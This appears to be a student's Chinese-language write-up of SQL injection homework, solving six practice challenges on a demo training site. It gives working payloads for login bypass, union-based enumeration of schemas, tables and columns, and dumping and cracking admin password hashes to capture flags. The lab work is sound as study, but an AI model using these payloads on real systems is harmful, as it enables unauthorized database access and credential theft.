0517-Red-Team-SQL-Inj

--- title: 0517-Red-Team-SQL-Inj # 簡報的名稱 tags: 0517-Red-Team-SQL-Inj, SQL-Inj # 簡報的標籤 slideOptions: # spotlight: # enabled: true --- {%hackmd theme-dark %} # 0517-Red-Team-SQL-Inj HW ### Jeff ### [sql-inj練習網站](http://1ion.tw/demo/) ### 練習一：/demo_sqli_1/ - [x] 完成 * Payload ```c= username: 'OR 1=1 -- ``` * FLAG: :::success flag{eaSy_sq1i_0oO1} ::: ![](https://i.imgur.com/JRJOiJX.jpg) ### 練習二：/demo_sqli_2/ - [x] 完成 (1)判斷有幾個column?(為了使用union) * Payload ```c= id=1 order by 4 ``` ![](https://i.imgur.com/53ISGWK.jpg) * order by 4的時候才噴錯誤 * 判斷：總共有三個columns (2)判斷資料庫類型（分別檢查是否為MySQL,Oracle,sqlite） * Payload ```c= id=1 union select 1,sqlite_version(),2 ``` * 結果：sqlite => 3.22.0 ![](https://i.imgur.com/tjoqG2S.jpg) (3)列舉Table: * Payload ```c= id=1 union SELECT 1,2,name FROM sqlite_master WHERE type='table' ``` ![](https://i.imgur.com/TP4qvdV.jpg) * 結果：得到三個Tables => member, news, sqlite_sequence() (4)列舉 schema * Payload ```c= id=1 union SELECT 1,2,sql FROM sqlite_master WHERE type='table' ``` ![](https://i.imgur.com/TBPjAWN.jpg) (5)獲取column資料 * Payload ```c= id=1 union select id, username, password from member ``` ![](https://i.imgur.com/NiL8uA1.jpg) * FLAG: :::success flag{eaSy_sq2InHect1on_0222222} ::: ### 練習三：/demo_sqli_3/ - [x] 完成 * 原始程式碼檢視： * ![](https://i.imgur.com/ZzvmnB2.png) * 第一個row必須要==='admin' * password === row第二個值 * 為什麼要使用string當column的輸入？ ![](https://i.imgur.com/Sy9XAtq.png) * Payload ```c= username: ' union select "admin", "omgomg" --' password: omgomg ``` ![](https://i.imgur.com/o272us5.jpg) * FLAG: :::success flag{CeaSy_sq1i2_ds85nS} ::: * TODO: - [ ] 將admin的密碼破出來 ### 練習四：/demo_sqli_4/ - [x] 完成 * 心得： * 有時候URL記得URL encode網站才會有反應 * 錯誤不一定是會跳sql error。像這題就是跳轉頁面 1. 判斷columns個數。使用 => id=2 order by 4 * Payload ```c= http://1ion.tw/demo/demo_sqli_4/page.php?id=2%20order%20by%204%23%27 ``` * order by = 4 時error跳轉 * 若要使用hackbar 裡面的工具 id=2'+ORDER+BY+4 ->記得加單引號 * 著解不同會有不同結果（Payload都要記得URL encode） * id = 2' order by 4 --' => 失敗 * id = 2' order by 4 #' => 成功 * id = 2 order by 4 #' => 成功 * [Resources](https://mariadb.com/kb/en/comment-syntax/) 2. 查資料庫版本 * 以下兩個Payload都可以work ```c= http://1ion.tw/demo/demo_sqli_4/page.php?id=5' union select 1,version(),3 --' http://1ion.tw/demo/demo_sqli_4/page.php?id=5' union select 1,version(),3 #' ``` * Payload(URL encode)，以上擇一 ```c= http://1ion.tw/demo/demo_sqli_4/page.php?id=5%27%20union%20select%201%2Cversion%28%29%2C3%20--%27 ``` * MARIABD 常見函式 * [查SCHEMA](https://mariadb.com/kb/en/information-functions/) * [列舉schema（Database）](https://dataedo.com/kb/query/mariadb/list-schemas-in-database) 3. 列舉schema（Database），法一 * Payload ```c= http://1ion.tw/demo/demo_sqli_4/page.php?id=5%27%20union%20select%201%2CSCHEMA%28%29%2Cuser%28%29%20%23%27 ``` ![](https://i.imgur.com/T5EHICQ.jpg) * 得到database name => demo4 * 列舉user * Payload ```c= http://1ion.tw/demo/demo_sqli_4/page.php?id=5' union select 1,version(),user() #' ``` * Payload(URL encode) ```c= http://1ion.tw/demo/demo_sqli_4/page.php?id=5%27%20union%20select%201%2Crow_count%28%29%2Cuser%28%29%20%23%27 ``` ![](https://i.imgur.com/rjYlsbu.jpg) * user也叫demo4 * 發現ROW_COUNT = 0 * 列舉schema（Database），法二 * Payload ```c= id =5' union select 1,schema_name,3 from information_schema.schemata limit 1,1 #' ``` * 一定要使用limit -> 如此才會顯示 * 可以調整offset * Payload(URL encode) ```c= http://1ion.tw/demo/demo_sqli_4/page.php?id=5%27%20union%20select%201%2Cschema_name%2C3%20from%20information_schema.schemata%20limit%201,1%20%23%27 ``` ![](https://i.imgur.com/lkZoxhI.jpg) 4. 列舉Table * [Information Schema COLUMNS Table](https://mariadb.com/kb/en/information-schema-columns-table/) * Payload ```c= id=5' union select 1,table_name,3 from information_schema.columns limit 1,1 #' ``` * Payload(URL encode) ```c= http://1ion.tw/demo/demo_sqli_4/page.php?id=5%27%20union%20select%201%2Ctable_name%2C3%20from%20information_schema.columns%20limit%201,1%20%23%27 ``` ![](https://i.imgur.com/GXlM1Gu.jpg) * 可以把information schema columns的所有table全部列舉出來 * limit0,1 => news * limit1,1 => users * limit2,1 => APPLICABLE_ROLES * limit3,1 => CHARACTER_SETS * ...... ![](https://i.imgur.com/5iFv7WR.jpg) ![](https://i.imgur.com/AuZJ988.jpg) 5. 列舉Column * 獲取id * Payload ```c= id=5' union select 1,column_name,3 from information_schema.columns where table_name="users" limit 0,1 #' ``` * Payload(URL encode) ```c= http://1ion.tw/demo/demo_sqli_4/page.php?id=5%27%20union%20select%201%2Ctable_name%2C3%20from%20information_schema.columns%20limit%201,1%20%23%27 ``` ![](https://i.imgur.com/s67D7Ca.jpg) * 獲取username * Payload ```c= id=5' union select 1,column_name,3 from information_schema.columns where table_name="users" limit 1,1 #' ``` * Payload(URL encode) ```c= http://1ion.tw/demo/demo_sqli_4/page.php?id=5%27%20union%20select%201%2Ccolumn_name%2C3%20from%20information_schema.columns%20where%20table_name%3D%22users%22%20limit%201%2C1%20%23%27 ``` ![](https://i.imgur.com/vLZMLxD.jpg) * 得到password * Payload ```c= id=5' union select 1,column_name,3 from information_schema.columns where table_name="users" limit 2,1 #' ``` * Payload(URL encode) ```c= http://1ion.tw/demo/demo_sqli_4/page.php?id=5%27%20union%20select%201%2Ccolumn_name%2C3%20from%20information_schema.columns%20where%20table_name%3D%22users%22%20limit%202%2C1%20%23%27 ``` ![](https://i.imgur.com/L4WagjH.jpg) 6. Exploit! * 拿資料 * Payload ```c= id=5' union select id,username,password from users limit 0,1 #' ``` * Payload(URL encode) ```c= http://1ion.tw/demo/demo_sqli_4/page.php?id=5%27%20union%20select%20id%2Cusername%2Cpassword%20from%20users%20limit%200%2C1%20%23%27 ``` ![](https://i.imgur.com/Y5yCOwd.jpg) * username:admin * password:098f7fe7bc33cab697d08bbb771e9c6e642f53f3 * sha1:a145621 ![](https://i.imgur.com/MEqgjkk.jpg) * :::success FLAG:flag{sQl1_lS_eaS1_r1ght} ::: ![](https://i.imgur.com/TLrBZD2.jpg) ### 練習五：/demo_sqli_5/ - [ ] 完成 ### 練習六：/demo_sqli_6_err/ - [x] 完成 1. 判斷有幾個欄位 * Payload ```c= http://1ion.tw/demo/demo_sqli_6_err/page.php?id=1 order by 9 ``` ![](https://i.imgur.com/pEV5sUD.jpg) * 結果跳error * 判斷：只有8個columns 2. 判斷其資料庫類型 * Payload ```c= http://1ion.tw/demo/demo_sqli_6_err/page.php?id=5 union select 1,2,version(),4,5,6,7,8 ``` ![](https://i.imgur.com/SSxRi4S.jpg) * version(), @@version都可以work * sqlite_version()無法 * 判斷：MariaDB資料庫，版本10.1.44 3. 列舉database => database名稱：demo6 ```c= http://1ion.tw/demo/demo_sqli_6_err/page.php?id=5 union select 1,2,schema_name,4,5,6,7,8 from information_schema.schemata ``` ![](https://i.imgur.com/ons2NLf.jpg) 4. 列舉table ```c= http://1ion.tw/demo/demo_sqli_6_err/page.php?id=5 union select 1,table_name,table_schema,4,5,6,7,8 from information_schema.TABLES ``` ![](https://i.imgur.com/5jRiXuP.jpg) 5. 列舉columns * 得id欄位: ```c= http://1ion.tw/demo/demo_sqli_6_err/page.php?id=5 union select 1,2,column_name,4,5,6,7,8 from information_schema.columns where table_name="members" ``` ![](https://i.imgur.com/1G8R1kN.jpg) * 得user欄位 ```c= http://1ion.tw/demo/demo_sqli_6_err/page.php?id=5 union select 1,2,column_name,4,5,6,7,8 from information_schema.columns where table_name="members" limit 1,1 -- ``` ![](https://i.imgur.com/GTrXbM9.jpg) * 得pass欄位 ```c= http://1ion.tw/demo/demo_sqli_6_err/page.php?id=5 union select 1,2,column_name,4,5,6,7,8 from information_schema.columns where table_name="members" limit 2,1 -- ``` ![](https://i.imgur.com/itq8ZLC.jpg) 6. 列舉帳密 ```c= http://1ion.tw/demo/demo_sqli_6_err/page.php?id=5 union select 1,user,pass,4,5,6,7,8 from members ``` ![](https://i.imgur.com/zesIxPd.jpg) * admin * f379eaf3c831b04de153469d1bec345e 解密後=>666666 ![](https://i.imgur.com/38qVRKm.jpg) 7. 登入拿FLAG :::success flag{sQl1_666666666666} ::: ![](https://i.imgur.com/MLGALCV.jpg) ### 反思：mission1,6題型相同 * 差異點:使用的資料庫不同 => 所需要的語法也不同，凸顯出優先判斷資料庫的重要性（先判斷是哪種資料庫在入侵，可以提升效率） * 好用的判斷資料庫語法 ![](https://i.imgur.com/3mOjz5B.jpg) ![](https://i.imgur.com/wR22wGW.jpg) * 資料來源：Eason提供的ppt